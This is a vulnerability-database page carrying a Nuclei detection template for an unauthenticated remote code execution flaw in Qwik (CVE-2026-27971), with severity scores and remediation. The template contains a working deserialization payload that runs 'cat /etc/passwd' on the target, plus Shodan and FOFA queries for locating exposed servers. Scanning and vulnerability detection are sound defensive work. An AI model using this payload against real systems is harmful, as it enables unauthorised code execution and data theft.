Qwik - Unauthenticated RCE via server$ Deserialization

CVE-2026-27971

Verified

Description

Qwik <=1.19.0 contains an insecure deserialization vulnerability in the server$ RPC mechanism, letting unauthenticated attackers execute arbitrary code remotely, exploit requires require() availability at runtime.

Severity

Critical

CVSS Score

9.2

Exploit Probability

23%

Published Date

March 4, 2026

Template Author

omarkurt

CVE-2026-27971.yaml

id: CVE-2026-27971

info:
  name: Qwik - Unauthenticated RCE via server$ Deserialization
  author: omarkurt
  severity: critical
  description: |
    Qwik <=1.19.0 contains an insecure deserialization vulnerability in the server$ RPC mechanism, letting unauthenticated attackers execute arbitrary code remotely, exploit requires require() availability at runtime.
  impact: |
    Unauthenticated attackers can execute arbitrary code on the server, leading to full system compromise.
  remediation: |
    Update to version 1.19.1 or later.
  reference:
    - https://github.com/QwikDev/qwik/security/advisories/GHSA-p9x5-jp3h-96mm
    - https://vulnerabletarget.com/VT-2026-27971
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
    cvss-score: 9.2
    cve-id: CVE-2026-27971
    epss-score: 0.23118
    epss-percentile: 0.95903
    cwe-id: CWE-502
  metadata:
    max-request: 1
    verified: true
    shodan-query: http.html:"q:version"
    fofa-query: body="q:version"
  tags: cve,cve2026,qwik,rce,deserialization,vkev

http:
  - raw:
      - |
        POST /?qfunc=sync HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/qwik-json
        X-QRL: sync
        Origin: {{RootURL}}

        {"_objs":["\u0002./node_modules/cross-spawn/index#sync","cat","/etc/passwd",["2"],["0","1","3"]],"_entry":"4"}

    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
          - "status_code == 200"
          - "contains(header, 'application/qwik-json')"
        condition: and
# digest: 4a0a0047304502205ce4d88fd786beefe5d402838834c5af7b243bdc398a0e1124dec6417275b2b9022100d1c221044409638ce9fc6a12a2b2f61f149d932fa190b5933f082050f553bfa4:922c64590222798bb761d5b6d8e72950

9.2Score

CVSS Metrics

CVSS Vector:

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CVE ID:

cve-2026-27971

CWE ID:

cwe-502

References

https://github.com/QwikDev/qwik/security/advisories/GHSA-p9x5-jp3h-96mm https://vulnerabletarget.com/VT-2026-27971

Remediation Steps

Update to version 1.19.1 or later.

id: CVE-2026-27971

info:
  name: Qwik - Unauthenticated RCE via server$ Deserialization
  author: omarkurt
  severity: critical
  description: |
    Qwik <=1.19.0 contains an insecure deserialization vulnerability in the server$ RPC mechanism, letting unauthenticated attackers execute arbitrary code remotely, exploit requires require() availability at runtime.
  impact: |
    Unauthenticated attackers can execute arbitrary code on the server, leading to full system compromise.
  remediation: |
    Update to version 1.19.1 or later.
  reference:
    - https://github.com/QwikDev/qwik/security/advisories/GHSA-p9x5-jp3h-96mm
    - https://vulnerabletarget.com/VT-2026-27971
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
    cvss-score: 9.2
    cve-id: CVE-2026-27971
    epss-score: 0.23118
    epss-percentile: 0.95903
    cwe-id: CWE-502
  metadata:
    max-request: 1
    verified: true
    shodan-query: http.html:"q:version"
    fofa-query: body="q:version"
  tags: cve,cve2026,qwik,rce,deserialization,vkev

http:
  - raw:
      - |
        POST /?qfunc=sync HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/qwik-json
        X-QRL: sync
        Origin: {{RootURL}}

        {"_objs":["\u0002./node_modules/cross-spawn/index#sync","cat","/etc/passwd",["2"],["0","1","3"]],"_entry":"4"}

    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
          - "status_code == 200"
          - "contains(header, 'application/qwik-json')"
        condition: and
# digest: 4a0a0047304502205ce4d88fd786beefe5d402838834c5af7b243bdc398a0e1124dec6417275b2b9022100d1c221044409638ce9fc6a12a2b2f61f149d932fa190b5933f082050f553bfa4:922c64590222798bb761d5b6d8e72950

Qwik - Unauthenticated RCE via server$ Deserialization

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Qwik - Unauthenticated RCE via server$ Deserialization

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps